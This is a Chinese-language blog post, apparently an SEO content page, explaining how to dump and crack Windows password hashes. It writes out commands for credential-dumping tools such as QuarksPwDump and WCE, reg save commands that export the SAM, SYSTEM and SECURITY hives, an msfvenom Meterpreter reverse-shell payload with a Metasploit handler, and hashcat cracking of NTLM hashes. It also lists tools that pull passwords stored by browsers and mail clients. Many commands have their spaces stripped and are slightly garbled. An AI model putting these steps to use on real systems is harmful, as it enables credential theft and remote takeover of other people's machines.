大家好,关于windows密码很多朋友都还不太明白,不过没关系,因为今天小编就来为大家分享关于Windows密码获取和破解的知识点,相信应该可以解决大家的一些困惑和问题,如果碰巧可以解决您的问题,还望关注下本站哦,希望对各位有所帮助!
本文只是简单的讲明密码获取和破解
具体的操作细节均以模糊或具体代码混淆等方式避开
如有兴趣请自行研究,本文不做细说~~~
Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~
密码获取工具:
gethash、gsecdump、QuarksPwDump、Pwdump、mimikatz、WCE……
QuarksPwDump:
是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。
QuarksPwDump-dh1//导出本地哈希值\nQuarksPwDump-dhdc//导出内存中域账户哈希值\nQuarksPwDump-dhd//导出域哈希值(指定NTDS文件)\n
WCE:
是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一
wce-a//获取所有账户哈希值\n
reg命令:导出密码文件
通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中
regsavehklm\\samsam.hive\nregsavehklm\\systemsystem.hive\nregsavehklm\\securitysecurity.hive\n
命令执行后将会将文件保存在本地~
PowerShell获取:
PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码
MSF反弹hashdump及mimikatz获取:
通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~
>msfvenom-pwindows/metpreter/reverse_tcpLHOST=192.168.2.196LPORT=443-fexe-omet.exe\nMSF使用反弹处理模块
>useexploit/multi/handler\n>setPAYLOADwindows/meterpreter/reverse_tcp\n>setLHOST192.168.2.0\n>setLPORT443\n>exploit\n提权操作……
其它小工具
下列小工具在Windows平台运行就会获得相关的用户凭证……
mailpv:获取mail密码
mspass:获取MSN密码
IEPV:获取IE浏览器缓存密码
passwordfox:获取Firefox浏览器凭证
chromepass:获取谷歌浏览器凭证
无线网络密码获取工具
远程桌面密码获取:
rdpv——cmdkey/list——netpass.exe
破解密码哈希值
ophcrack破解:
导入哈希值,加载Tables,执行Crack~
hashcat破解:
将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:
hashcat-m1000-a0-owinpassok.txtwin.hashpassword.lst--username\n
-m1000表示破解密码类型为NTLM
-o[feilname].txt表示将破解后的文件输出到指定的文件中
--removewin.hash表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解
获取SAM和SYSTEM文件
文件通常在C:\\Windows\\System32\\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAMSYSTEMSECURITY三个文件
使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~
导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解
windows密码的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于Windows密码获取和破解、windows密码的信息别忘了在本站进行查找哦。